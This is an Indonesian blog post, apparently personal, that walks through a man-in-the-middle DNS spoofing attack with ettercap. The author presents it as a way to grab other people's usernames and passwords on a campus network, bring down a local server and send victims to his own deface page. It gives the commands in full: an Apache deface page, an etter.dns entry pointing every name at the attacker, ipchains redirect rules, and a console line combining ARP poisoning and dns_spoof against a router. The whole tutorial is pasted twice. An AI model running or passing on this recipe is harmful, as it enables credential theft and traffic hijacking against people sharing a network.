Man In The Middle attack DNS Spoofing
sesekali pernah iseng di kampus niatnya c mo sekalian mo dapetin username n password orang juga c tapi sekarang ini saya akan melakukan dengan ettercap lumayan sekalian bikin down tuh server local n bisa ngeganti halaman yang di akses dengan halaman localhost kita pribadi hehehehe.... berikut schemanya
Penjelasan sedikit ya... keadaan normal jadi setiap client paket yang ada di satu jaringan ke server maka server itu akan me replay paket kembali ke client tetapi apa bila kita meracuni paket data yang mengalir di dalam jaringan itu maka setiap server mengembalikkan replay ke client maka paket data yang di replay itu melalui komputer attacker terlebih dahulu (waou...bisa di bayangkan kan bahayanya)
okai kita langsung mulai saja sediakan program ettercap terlebih dahulu
1. pilih Unified Sniffing (CTRL + U) IP -> 192.168.1.168
pilih card interface atau biasanya untuk wireless ialah ra0
2. aktifkan httpd atau apache
andhika@54v0y:~$sudo /etc/init.d/apache start
edit /var/www/index.html dengan halaman deface semau kita.
3. edit etter.dns
andhika@54v0y:~$sudo cd /usr/share/ettercap/
andhika@54v0y:~:/usr/share/ettercap$sudo cp etter.dns etter.dns.old
andhika@54v0y:~:sudo /usr/share/ettercap$sudo gedit etter.dns
hapus semua field tulis
Code:
* A IP-ATTACKER
contoh:
* A 192.168.1.168
4. aktifkan ip table ettercap-ng
Code:
andhika@54v0y:~$sudo gedit /etc/etter.conf
aktifkan 2 baris, redir_command_on dengan redir_command_off
redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
save lalu close
5. aktifkan plugin dns_spoof di ettercap (CTRL + P).
aktifkan dengan mengklik 2x.
6. scan hosts list (CTRL + S).
7. add target list (add hanya ip router saja) (CTRL + T).
isi target 1 dengan ip router (/192.168.1.100/)untuk target 2 kosongkan ip agar semua request ip bisa di spoof kita hanya konsen di ip router saja.
8. aktifkan MITM attack ARP Poisoning (Mitm -> Arp Poisoning).
hanya pilih Sniff remote connections. klik OK
8. start sniffing happy ending ;-) (CTRL + W).
Bila Anda ingin mencoba di mode console bisa juga dengan mengetikkan
andhika@54v0y:$sudo ettercap -i eth0 -T -q -P dns_spoof -M ARP /192.168.1.100/ //
Penjelasan sedikit ya... keadaan normal jadi setiap client paket yang ada di satu jaringan ke server maka server itu akan me replay paket kembali ke client tetapi apa bila kita meracuni paket data yang mengalir di dalam jaringan itu maka setiap server mengembalikkan replay ke client maka paket data yang di replay itu melalui komputer attacker terlebih dahulu (waou...bisa di bayangkan kan bahayanya)
okai kita langsung mulai saja sediakan program ettercap terlebih dahulu
1. pilih Unified Sniffing (CTRL + U) IP -> 192.168.1.168
pilih card interface atau biasanya untuk wireless ialah ra0
2. aktifkan httpd atau apache
andhika@54v0y:~$sudo /etc/init.d/apache start
edit /var/www/index.html dengan halaman deface semau kita.
3. edit etter.dns
andhika@54v0y:~$sudo cd /usr/share/ettercap/
andhika@54v0y:~:/usr/share/ettercap$sudo cp etter.dns etter.dns.old
andhika@54v0y:~:sudo /usr/share/ettercap$sudo gedit etter.dns
hapus semua field tulis
Code:
* A IP-ATTACKER
contoh:
* A 192.168.1.168
4. aktifkan ip table ettercap-ng
Code:
andhika@54v0y:~$sudo gedit /etc/etter.conf
aktifkan 2 baris, redir_command_on dengan redir_command_off
redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
save lalu close
5. aktifkan plugin dns_spoof di ettercap (CTRL + P).
aktifkan dengan mengklik 2x.
6. scan hosts list (CTRL + S).
7. add target list (add hanya ip router saja) (CTRL + T).
isi target 1 dengan ip router (/192.168.1.100/)untuk target 2 kosongkan ip agar semua request ip bisa di spoof kita hanya konsen di ip router saja.
8. aktifkan MITM attack ARP Poisoning (Mitm -> Arp Poisoning).
hanya pilih Sniff remote connections. klik OK
8. start sniffing happy ending ;-) (CTRL + W).
Bila Anda ingin mencoba di mode console bisa juga dengan mengetikkan
andhika@54v0y:$sudo ettercap -i eth0 -T -q -P dns_spoof -M ARP /192.168.1.100/ //
Man In The Middle attack DNS Spoofing
Reviewed by Unknown
on
2:33 AM
Rating:
Reviewed by Unknown
on
2:33 AM
Rating:
